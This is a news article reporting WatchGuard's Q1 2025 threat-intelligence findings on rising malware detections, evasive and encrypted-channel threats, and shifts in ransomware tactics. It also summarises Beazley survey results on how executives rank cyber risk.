New threat intelligence released by WatchGuard Technologies has revealed a significant uptick in malware activity in the first quarter of 2025 (Q1 2025), pointing to a rapidly shifting cyber risk environment.
The data, compiled in WatchGuard’s Internet Security Report, recorded a 171% quarter-on-quarter rise in unique malware detections – the highest observed by the firm’s threat lab since tracking began.
The report highlighted a pronounced increase in evasive malware, with machine learning-based detection through WatchGuard’s IntelligentAV system growing 323% over the same period.
According to the findings, conventional security models reliant on known threat signatures are being circumvented as attackers intensify the use of obfuscation and encryption to deliver malware through encrypted traffic.
Corey Nachreiner, chief security officer at WatchGuard, said cyber criminals are now capable of launching precise, large-scale campaigns with the help of AI.
“Attackers now have the capabilities to launch highly targeted campaigns at scale using automated pipelines, emphasising the need for organisations to adopt robust, precise, and powerful security measures to stay ahead of the advancements in AI and the evolving cyber risks,” he said.
The analysis noted a 712% jump in new malware strains targeting endpoints – an increase that comes after several quarters of decline.
Among the most prominent threats was the LSASS dumper, a credential harvesting tool that manipulates kernel-level processes to bypass standard access controls.
While ransomware volumes dropped 85% over the quarter, the emergence of Termite ransomware as a leading detection suggests that attackers are modifying their approach.
Rather than locking data through encryption, threat actors are shifting to data exfiltration and extortion, aligning with improvements in enterprise recovery capabilities.
TLS-based malware activity also rose, with encrypted channels becoming a key vector.
Trojan.Agent.FZPI – a malicious HTML file leveraging both encryption and social engineering – was the top detection in this category. This malware blends known techniques into phishing payloads that mimic legitimate documents while evading detection.
Other notable trends included a decline in script-based malware, historically a dominant method, which fell to record lows.
In its place, attackers are increasingly using “Living off the Land” methods – employing legitimate system tools like Windows to carry out malicious activity.
The total number of unique network attack signatures fell 16% from the previous quarter, suggesting that attackers are focusing on exploiting a smaller set of known vulnerabilities – particularly legacy systems that remain unpatched.
Meanwhile, Application.Cashback.B.0835E4A4, a new malware family, was identified as the most widespread globally, indicating a need for region-specific defence strategies.
Malicious activity via email remains a prominent delivery mechanism, as generative AI enables attackers to develop increasingly convincing phishing content.
WatchGuard reported higher detection rates from AI-driven defences, which are proving essential in identifying threats at the network edge and on endpoints.
The timing of the report aligns with findings from Beazley’s latest Risk & Resilience study, which found that 29% of global executives now rank cyber as their top risk – up from 26% in 2024.
Despite this, 83% of surveyed leaders expressed confidence in their organisation’s cyber defences.
The Beazley report warned that this optimism may not fully align with the realities of the current cyber landscape.
It cited the growing use of AI in cybercrime, vulnerabilities in third-party systems, and politically motivated attacks as areas of concern.
